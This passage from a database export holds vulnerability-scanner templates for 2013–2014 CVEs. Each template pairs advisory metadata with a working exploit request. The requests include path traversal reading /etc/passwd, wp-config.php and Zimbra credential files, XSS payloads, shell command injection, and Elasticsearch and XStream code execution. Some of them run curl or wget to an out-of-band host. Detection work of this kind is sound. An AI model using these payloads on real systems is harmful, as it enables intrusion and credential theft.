http://www.baesystemsdetica.com.au/Research/Advisories/Xibo-Directory-Traversal-Vulnerability-%28DS-2013-00\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2013-5979\n cwe-id: CWE-22\n epss-score: 0.04915\n epss-percentile: 0.92611\n cpe: cpe:2.3:a:springsignage:xibo:1.2.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: springsignage\n product: xibo\n tags: cve2013,cve,lfi,edb,springsignage\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?p=../../../../../../../../../../../../../../../../etc/passwd%00index&q=About&ajax=true&_=1355714673828\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402201594ab82faa88c2638b590f8d2290c98cbba2ee290211a02a238f09cdf59789e02206977759c62401acb13c22b225a20b6b17866f8aacf67b8a67590ea7f7b0bc8b0:922c64590222798bb761d5b6d8e72950", "hash": "bd44efe2a1ee4ceed3f5d558be43be78", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f09" }, "name": "CVE-2013-6281.yaml", "content": "id: CVE-2013-6281\n\ninfo:\n name: WordPress Spreadsheet - Cross-Site Scripting\n author: random-robbie\n severity: medium\n description: |\n WordPress Spreadsheet plugin contains a reflected cross-site scripting vulnerability in /dhtmlxspreadsheet/codebase/spreadsheet.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected WordPress site, leading to potential data theft, session hijacking, or defacement.\n remediation: |\n Update the WordPress Spreadsheet plugin to the latest version, which includes proper input sanitization to mitigate the XSS vulnerability.\n reference:\n - https://wpscan.com/vulnerability/49785932-f4e0-4aaa-a86c-4017890227bf\n - https://wordpress.org/plugins/dhtmlxspreadsheet/\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6281\n - https://nvd.nist.gov/vuln/detail/CVE-2013-6281\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N\n cvss-score: 4.3\n cve-id: CVE-2013-6281\n cwe-id: CWE-79\n epss-score: 0.00327\n epss-percentile: 0.70301\n cpe: cpe:2.3:a:dhtmlx:dhtmlxspreadsheet:2.0:-:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: dhtmlx\n product: dhtmlxspreadsheet\n framework: wordpress\n google-query: inurl:/wp-content/plugins/dhtmlxspreadsheet\n tags: cve2013,cve,wp,wpscan,wordpress,xss,wp-plugin,dhtmlx\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/dhtmlxspreadsheet/codebase/spreadsheet.php?page=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"page: ''\"\n - \"dhx_rel_path\"\n condition: and\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022079dad5452b1c88999fef931cbe9ebdc94b286f675f074daceba867d5b3c98f690221008f233d1dbd073f71171ad3756acc9a91929c93719348f87c26e4c5ba95c7b43e:922c64590222798bb761d5b6d8e72950", "hash": "9f25a9700c85996ec7fc2dc5b646166e", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f0a" }, "name": "CVE-2013-7091.yaml", "content": "id: CVE-2013-7091\n\ninfo:\n name: Zimbra Collaboration Server 7.2.2/8.0.2 Local File Inclusion\n author: rubina119\n severity: medium\n description: A directory traversal vulnerability in /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz in Zimbra 7.2.2 and 8.0.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the skin parameter. This can be leveraged to execute arbitrary code by obtaining LDAP credentials and accessing the service/admin/soap API.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, potentially leading to unauthorized access or information disclosure.\n remediation: |\n Apply the latest security patches or upgrade to a newer version of Zimbra Collaboration Server to mitigate the LFI vulnerability.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2013-7091\n - https://www.exploit-db.com/exploits/30085\n - https://www.exploit-db.com/exploits/30472\n - http://www.exploit-db.com/exploits/30085\n - http://packetstormsecurity.com/files/124321\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2013-7091\n cwe-id: CWE-22\n epss-score: 0.97337\n epss-percentile: 0.99881\n cpe: cpe:2.3:a:synacor:zimbra_collaboration_suite:6.0.0:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: synacor\n product: zimbra_collaboration_suite\n tags: cve2013,cve,packetstorm,zimbra,lfi,edb,synacor\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00\"\n - \"{{BaseURL}}/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00\"\n\n stop-at-first-match: true\n\n matchers-condition: or\n matchers:\n - type: word\n words:\n - \"zimbra_server_hostname\"\n - \"zimbra_ldap_userdn\"\n - \"zimbra_ldap_password\"\n - \"ldap_postfix_password\"\n - \"ldap_amavis_password\"\n - \"ldap_nginx_password\"\n - \"mysql_root_password\"\n condition: or\n\n - type: regex\n regex:\n - \"root=.*:0:0\"\n# digest: 4a0a00473045022100f6cd40b93273474a23d293f197030390d10be43a736527361263f75941c19a1d02207e345080ec279f07c8b1a96d149c3a01abc367600abfbbf63a85dd89a95ef78b:922c64590222798bb761d5b6d8e72950", "hash": "18412de5f07ae6481e4dae3c44182818", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f0b" }, "name": "CVE-2013-7240.yaml", "content": "id: CVE-2013-7240\n\ninfo:\n name: WordPress Plugin Advanced Dewplayer 1.2 - Directory Traversal\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in download-file.php in the Advanced Dewplayer plugin 1.2 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the dew_file parameter.\n impact: |\n An attacker can exploit this vulnerability to access sensitive files, potentially leading to unauthorized disclosure of sensitive information.\n remediation: |\n Update to the latest version of the Advanced Dewplayer plugin or remove it if it is not actively used.\n reference:\n - https://www.exploit-db.com/exploits/38936\n - https://nvd.nist.gov/vuln/detail/CVE-2013-7240\n - https://wordpress.org/support/topic/security-vulnerability-cve-2013-7240-directory-traversal/\n - http://seclists.org/oss-sec/2013/q4/570\n - http://seclists.org/oss-sec/2013/q4/566\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2013-7240\n cwe-id: CWE-22\n epss-score: 0.21533\n epss-percentile: 0.96023\n cpe: cpe:2.3:a:westerndeal:advanced_dewplayer:1.2:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: westerndeal\n product: advanced_dewplayer\n google-query: inurl:\"/wp-content/plugins/advanced-dewplayer/\"\n tags: cve,cve2013,wp-plugin,lfi,edb,seclists,wordpress,westerndeal\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php?dew_file=../../../../wp-config.php'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"DB_NAME\"\n - \"DB_PASSWORD\"\n - \"DB_HOST\"\n - \"The base configurations of the WordPress\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100cce17b78559a95bf2f0943f96165e78642e273d655b3c17c6881820cc40df09f02207f5a415fa7bf76725f80007066ad4921d9425a34255db8d656c34257296adea3:922c64590222798bb761d5b6d8e72950", "hash": "415a48080d14787a14668be68c8cba27", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f0c" }, "name": "CVE-2013-7285.yaml", "content": "id: CVE-2013-7285\n\ninfo:\n name: XStream <1.4.6/1.4.10 - Remote Code Execution\n author: pwnhxl,vicrack\n severity: critical\n description: |\n Xstream API before 1.4.6 and 1.4.10 is susceptible to remote code execution. If the security framework has not been initialized, an attacker can run arbitrary shell commands by manipulating the processed input stream when unmarshaling XML or any supported format. This can allow an attacker to obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system.\n remediation: |\n Upgrade XStream to version 1.4.10 or later to mitigate this vulnerability.\n reference:\n - https://x-stream.github.io/CVE-2013-7285.html\n - https://www.mail-archive.com/user@xstream.codehaus.org/msg00607.html\n - https://www.mail-archive.com/user@xstream.codehaus.org/msg00604.html\n - https://nvd.nist.gov/vuln/detail/cve-2013-7285\n - https://blog.csdn.net/Xxy605/article/details/126297121\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2013-7285\n cwe-id: CWE-78\n epss-score: 0.55716\n epss-percentile: 0.97607\n cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: xstream_project\n product: xstream\n tags: cve2013,cve,xstream,deserialization,rce,oast,xstream_project\n\nhttp:\n - raw:\n - |\n POST / HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/xml\n\n \n foo\n \n java.lang.Comparable\n \n \n \n curl\n http://{{interactsh-url}}\n \n \n start\n \n \n \n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol\n words:\n - \"http\"\n\n - type: word\n part: interactsh_request\n words:\n - \"User-Agent: curl\"\n# digest: 4b0a00483046022100ed54d64a6a5d98f883eec6e0dc9bf3fb76b87372f2f242bcad697a3e8b0ada2d022100adb7292dab8008a25c2e9765555bc1f1eacac15af2ca9d04af09f6e758fd78ee:922c64590222798bb761d5b6d8e72950", "hash": "a918a65d2fed32fe463285456a4b6c4c", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f0d" }, "name": "CVE-2014-10037.yaml", "content": "id: CVE-2014-10037\n\ninfo:\n name: DomPHP 0.83 - Directory Traversal\n author: daffainfo\n severity: high\n description: A directory traversal vulnerability in DomPHP 0.83 and earlier allows remote attackers to have unspecified impacts via a .. (dot dot) in the url parameter to photoalbum/index.php.\n impact: |\n An attacker can read, modify, or delete sensitive files on the server, potentially leading to unauthorized access or data leakage.\n remediation: |\n Upgrade to a patched version of DomPHP or apply the necessary security patches to fix the directory traversal vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/30865\n - https://nvd.nist.gov/vuln/detail/CVE-2014-10037\n - http://www.exploit-db.com/exploits/30865\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/90582\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2014-10037\n cwe-id: CWE-22\n epss-score: 0.14101\n epss-percentile: 0.95548\n cpe: cpe:2.3:a:domphp:domphp:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: domphp\n product: domphp\n tags: cve2014,cve,lfi,edb,domphp\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/photoalbum/index.php?urlancien=&url=../../../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100a89179af6be12060f1fe5577e41d64f1b2826960d0485ad9e47556edc6ce21aa02205a19be61ffd6eb717e6ba7e0e9fe45d7292c97bf00654bebf6691684a9e5aef9:922c64590222798bb761d5b6d8e72950", "hash": "6bd7b54dda0d977d5a761fde93e6e3be", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f0e" }, "name": "CVE-2014-1203.yaml", "content": "id: CVE-2014-1203\n\ninfo:\n name: Eyou E-Mail <3.6 - Remote Code Execution\n author: pikpikcu\n severity: critical\n description: Eyou Mail System before 3.6 allows remote attackers to execute arbitrary commands via shell metacharacters in the domain parameter to admin/domain/ip_login_set/d_ip_login_get.php via the get_login_ip_config_file function.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n remediation: |\n Upgrade to a patched version of Eyou E-Mail <3.6 or apply the necessary security patches.\n reference:\n - https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g\n - https://nvd.nist.gov/vuln/detail/CVE-2014-1203\n - http://seclists.org/fulldisclosure/2014/Jan/32\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2014-1203\n cwe-id: CWE-77\n epss-score: 0.02045\n epss-percentile: 0.88732\n cpe: cpe:2.3:a:eyou:eyou:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: eyou\n product: eyou\n tags: cve2014,cve,seclists,rce,eyou\n\nhttp:\n - raw:\n - |\n POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n type='|cat /etc/passwd||'\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100cf1d735e7a763f8e92cbac05244f4058513dca66d977cff22094bf53df82ef05022100d45e86c3b9bc7f43e3339b4eb92a91b8f83331a6ecedfa3cbf9dee6a49453580:922c64590222798bb761d5b6d8e72950", "hash": "d01e38f13de7ca98aebca1a7aaf99380", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f0f" }, "name": "CVE-2014-2321.yaml", "content": "id: CVE-2014-2321\n\ninfo:\n name: ZTE Cable Modem Web Shell\n author: geeknik\n severity: critical\n description: |\n ZTE F460 and F660 cable modems allows remote attackers to obtain administrative access via sendcmd requests to web_shell_cmd.gch, as demonstrated by using \"set TelnetCfg\" commands to enable a TELNET service with specified credentials.\n impact: |\n Remote code execution\n remediation: |\n Apply the latest firmware update provided by ZTE to fix the vulnerability\n reference:\n - https://yosmelvin.wordpress.com/2017/09/21/f660-modem-hack/\n - https://jalalsela.com/zxhn-h108n-router-web-shell-secrets/\n - https://nvd.nist.gov/vuln/detail/CVE-2014-2321\n - http://www.kb.cert.org/vuls/id/600724\n - http://www.myxzy.com/post-411.html\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:C/A:C\n cvss-score: 10\n cve-id: CVE-2014-2321\n cwe-id: CWE-264\n epss-score: 0.96364\n epss-percentile: 0.99452\n cpe: cpe:2.3:h:zte:f460:-:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: zte\n product: f460\n tags: cve2014,cve,iot,zte\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/web_shell_cmd.gch\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"please input shell command\"\n - \"ZTE Corporation. All rights reserved\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022023bcec4a925719964d361455cce2d3185288b3dd03c0a9b3a61f8704b16ca756022100e7f90ae800794e873f1ef774d97e8007a67fbc2cf35e4fde660f40f31f262a43:922c64590222798bb761d5b6d8e72950", "hash": "0f1309d88ae728b5ea913557e2564c9b", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f10" }, "name": "CVE-2014-2323.yaml", "content": "id: CVE-2014-2323\n\ninfo:\n name: Lighttpd 1.4.34 SQL Injection and Path Traversal\n author: geeknik\n severity: critical\n description: A SQL injection vulnerability in mod_mysql_vhost.c in lighttpd before 1.4.35 allows remote attackers to execute arbitrary SQL commands via the host name (related to request_check_hostname).\n impact: |\n Successful exploitation of these vulnerabilities could lead to unauthorized access to sensitive data and remote code execution\n remediation: |\n Upgrade to a patched version of Lighttpd or apply the necessary security patches\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2014-2323\n - https://download.lighttpd.net/lighttpd/security/lighttpd_sa_2014_01.txt\n - http://www.lighttpd.net/2014/3/12/1.4.35/\n - http://seclists.org/oss-sec/2014/q1/561\n - http://jvn.jp/en/jp/JVN37417423/index.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2014-2323\n cwe-id: CWE-89\n epss-score: 0.96033\n epss-percentile: 0.99445\n cpe: cpe:2.3:a:lighttpd:lighttpd:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: lighttpd\n product: lighttpd\n tags: cve2014,cve,lighttpd,injection,seclists,sqli\n\nhttp:\n - raw:\n - |+\n GET /etc/passwd HTTP/1.1\n Host: [::1]' UNION SELECT '/\n\n unsafe: true\n matchers:\n - type: regex\n regex:\n - \"root:[x*]:0:0:\"\n# digest: 4b0a00483046022100e371572751932d4a500df96a892091eba4e0a4d8ce6a52634b13e38cd64f05cc022100dcb4be0eedfb4cb66a15ce756a7a6db6b4fd32eb5bd445bc094c025d8706bfd0:922c64590222798bb761d5b6d8e72950", "hash": "5b2dbd58f7d3c7cad5e5ea297087c2ed", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f11" }, "name": "CVE-2014-2383.yaml", "content": "id: CVE-2014-2383\n\ninfo:\n name: Dompdf < v0.6.0 - Local File Inclusion\n author: 0x_Akoko,akincibor,ritikchaddha\n severity: medium\n description: |\n A vulnerability in dompdf.php in dompdf before 0.6.1, when DOMPDF_ENABLE_PHP is enabled, allows context-dependent attackers to bypass chroot protections and read arbitrary files via a PHP protocol and wrappers in the input_file parameter, as demonstrated by a php://filter/read=convert.base64-encode/resource in the input_file parameter.\n impact: |\n The vulnerability can lead to unauthorized access to sensitive files, remote code execution, and compromise of the affected system.\n remediation: |\n Upgrade Dompdf to a version higher than v0.6.0 to mitigate the vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/33004\n - http://seclists.org/fulldisclosure/2014/Apr/258\n - https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2383/\n - https://wpscan.com/vulnerability/1d64d0cb-6b71-47bb-8807-7c8350922582\n - https://nvd.nist.gov/vuln/detail/CVE-2014-2383\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P\n cvss-score: 6.8\n cve-id: CVE-2014-2383\n cwe-id: CWE-200\n epss-score: 0.00511\n epss-percentile: 0.76134\n cpe: cpe:2.3:a:dompdf:dompdf:*:beta3:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 11\n vendor: dompdf\n product: dompdf\n tags: cve2014,cve,lfi,wp-plugin,wpscan,dompdf,wordpress,wp,edb,seclists\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/dompdf.php?input_file=php://filter/resource=/etc/passwd\"\n - \"{{BaseURL}}/PhpSpreadsheet/Writer/PDF/DomPDF.php?input_file=php://filter/resource=/etc/passwd\"\n - \"{{BaseURL}}/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd\"\n - \"{{BaseURL}}/includes/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd\"\n - \"{{BaseURL}}/wp-content/plugins/web-portal-lite-client-portal-secure-file-sharing-private-messaging/includes/libs/pdf/dompdf.php?input_file=php://filter/resource=/etc/passwd\"\n - \"{{BaseURL}}/wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd\"\n - \"{{BaseURL}}/wp-content/plugins/abstract-submission/dompdf-0.5.1/dompdf.php?input_file=php://filter/resource=/etc/passwd\"\n - \"{{BaseURL}}/wp-content/plugins/post-pdf-export/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd\"\n - \"{{BaseURL}}/wp-content/plugins/blogtopdf/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd\"\n - \"{{BaseURL}}/wp-content/plugins/gboutique/library/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd\"\n - \"{{BaseURL}}/wp-content/plugins/wp-ecommerce-shop-styling/includes/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd\"\n\n stop-at-first-match: true\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"application/pdf\"\n - 'filename=\"dompdf_out.pdf\"'\n condition: and\n\n - type: regex\n regex:\n - \"root:[x*]:0:0\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502200f047a6a60901eeb5016353d7e3b93092b406eb7c4eaa8ecf9759f8b6ea7e81a022100c25b83b98679c1421d0b2383cdc9c6f9c736059731e9452b26d580b80e55e4ee:922c64590222798bb761d5b6d8e72950", "hash": "0483a45274e8d4817135915b1b72ac4b", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f12" }, "name": "CVE-2014-2908.yaml", "content": "id: CVE-2014-2908\n\ninfo:\n name: Siemens SIMATIC S7-1200 CPU - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: A cross-site scripting vulnerability in the integrated web server on Siemens SIMATIC S7-1200 CPU devices 2.x and 3.x allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected user's browser.\n remediation: Upgrade to v4.0 or later.\n reference:\n - https://www.exploit-db.com/exploits/44687\n - https://cert-portal.siemens.com/productcert/pdf/ssa-892012.pdf\n - https://nvd.nist.gov/vuln/detail/CVE-2014-2908\n - http://ics-cert.us-cert.gov/advisories/ICSA-14-114-02\n - http://www.siemens.com/innovation/pool/de/forschungsfelder/siemens_security_advisory_ssa-892012.pdf\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N\n cvss-score: 4.3\n cve-id: CVE-2014-2908\n cwe-id: CWE-79\n epss-score: 0.00594\n epss-percentile: 0.76056\n cpe: cpe:2.3:o:siemens:simatic_s7_cpu_1200_firmware:2.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: siemens\n product: simatic_s7_cpu_1200_firmware\n tags: cve2014,cve,xss,siemens,edb\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/Portal/Portal.mwsl?PriNav=Bgz&filtername=Name&filtervalue=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&Send=Filter'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502202a67b8f296a38cdec3cc9fadbed079d23964fcd5973e2a30a4ebc3588772051e022100acee6714b419eaf8cf4ab99aef816ab12d1a04410e9aef0c8a18a45744943b0d:922c64590222798bb761d5b6d8e72950", "hash": "a5064a22738bb9d5429f3641fcefd090", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f13" }, "name": "CVE-2014-2962.yaml", "content": "id: CVE-2014-2962\n\ninfo:\n name: Belkin N150 Router 1.00.08/1.00.09 - Path Traversal\n author: daffainfo\n severity: high\n description: A path traversal vulnerability in the webproc cgi module on the Belkin N150 F9K1009 v1 router with firmware before 1.00.08 allows remote attackers to read arbitrary files via a full pathname in the getpage parameter.\n impact: |\n An attacker can exploit this vulnerability to view sensitive files, potentially leading to unauthorized access, data leakage, or further compromise of the system.\n remediation: Ensure that appropriate firewall rules are in place to restrict access to port 80/tcp from external untrusted sources.\n reference:\n - https://www.kb.cert.org/vuls/id/774788\n - https://nvd.nist.gov/vuln/detail/CVE-2014-2962l\n - http://www.kb.cert.org/vuls/id/774788\n - http://www.belkin.com/us/support-article?articleNum=109400\n - https://www.exploit-db.com/exploits/38488/\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:N/A:N\n cvss-score: 7.8\n cve-id: CVE-2014-2962\n cwe-id: CWE-22\n epss-score: 0.95825\n epss-percentile: 0.99395\n cpe: cpe:2.3:o:belkin:n150_f9k1009_firmware:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: belkin\n product: n150_f9k1009_firmware\n tags: cve2014,cve,lfi,router,firmware,traversal,belkin\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/cgi-bin/webproc?getpage=/etc/passwd&var:page=deviceinfo\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022032e80b0db58d467a4ce0dccb54620714fa677489117263f882c989d96adb1e9b022100a4a43436790a6bfae53280a94851a270b2f0ae270d5b78e1c53f5be7f1911963:922c64590222798bb761d5b6d8e72950", "hash": "e9c3e51ac4ef904ce6812ce37dc59ade", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f14" }, "name": "CVE-2014-3120.yaml", "content": "id: CVE-2014-3120\n\ninfo:\n name: ElasticSearch v1.1.1/1.2 RCE\n author: pikpikcu\n severity: medium\n description: |\n The default configuration in Elasticsearch before 1.2 enables dynamic scripting, which allows remote attackers to execute arbitrary MVEL expressions and Java code via the source parameter to _search. Be aware this only violates the vendor's intended security policy if the user does not run Elasticsearch in its own independent virtual machine.\n impact: |\n Allows remote attackers to execute arbitrary code on the affected system\n remediation: |\n Upgrade to a patched version of ElasticSearch\n reference:\n - https://github.com/vulhub/vulhub/tree/master/elasticsearch/CVE-2014-3120\n - https://www.elastic.co/blog/logstash-1-4-3-released\n - https://nvd.nist.gov/vuln/detail/CVE-2014-3120\n - http://bouk.co/blog/elasticsearch-rce/\n - https://www.elastic.co/community/security/\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P\n cvss-score: 6.8\n cve-id: CVE-2014-3120\n cwe-id: CWE-284\n epss-score: 0.53209\n epss-percentile: 0.97551\n cpe: cpe:2.3:a:elasticsearch:elasticsearch:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: elasticsearch\n product: elasticsearch\n tags: cve2014,cve,rce,elasticsearch,kev,vulhub,elastic\n\nhttp:\n - raw:\n - |\n POST /_search?pretty HTTP/1.1\n Host: {{Hostname}}\n Accept: */*\n Accept-Language: en\n Content-Type: application/x-www-form-urlencoded\n\n {\n \"size\": 1,\n \"query\": {\n \"filtered\": {\n \"query\": {\n \"match_all\": {\n }\n }\n }\n },\n \"script_fields\": {\n \"command\": {\n \"script\": \"import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\\\"cat /etc/passwd\\\").getInputStream()).useDelimiter(\\\"\\\\\\\\A\\\").next();\"\n }\n }\n }\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"application/json\"\n\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502203c75efbf9b064d21bacbd48c486b930e90217b4ae6e2d0ae67761ed727e5ae1c022100e524324c159f69fa14357b63d62c412273768e8b0377d797d5d02df83e454767:922c64590222798bb761d5b6d8e72950", "hash": "a68ecff20bf05ea8ab12e7ef7e98d4a9", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f15" }, "name": "CVE-2014-3206.yaml", "content": "id: CVE-2014-3206\n\ninfo:\n name: Seagate BlackArmor NAS - Command Injection\n author: gy741\n severity: critical\n description: Seagate BlackArmor NAS allows remote attackers to execute arbitrary code via the session parameter to localhost/backupmgt/localJob.php or the auth_name parameter to localhost/backupmgmt/pre_connect_check.php.\n impact: |\n Successful exploitation of this vulnerability allows an attacker to execute arbitrary commands with the privileges of the affected device, potentially leading to unauthorized access, data loss, or further compromise of the network.\n remediation: |\n Apply the latest firmware update provided by Seagate to patch the command injection vulnerability.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2014-3206\n - https://www.exploit-db.com/exploits/33159\n - https://www.exploit-db.com/exploits/33159/\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2014-3206\n cwe-id: CWE-20\n epss-score: 0.2561\n epss-percentile: 0.96594\n cpe: cpe:2.3:o:seagate:blackarmor_nas_220_firmware:-:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: seagate\n product: blackarmor_nas_220_firmware\n tags: cve2014,cve,seagate,rce,edb\n\nhttp:\n - raw:\n - |\n GET /backupmgt/localJob.php?session=fail;wget http://{{interactsh-url}}; HTTP/1.1\n Host: {{Hostname}}\n Accept: */*\n - |\n GET /backupmgt/pre_connect_check.php?auth_name=fail;wget http://{{interactsh-url}}; HTTP/1.1\n Host: {{Hostname}}\n Accept: */*\n\n unsafe: true\n matchers:\n - type: word\n part: interactsh_protocol\n words:\n - 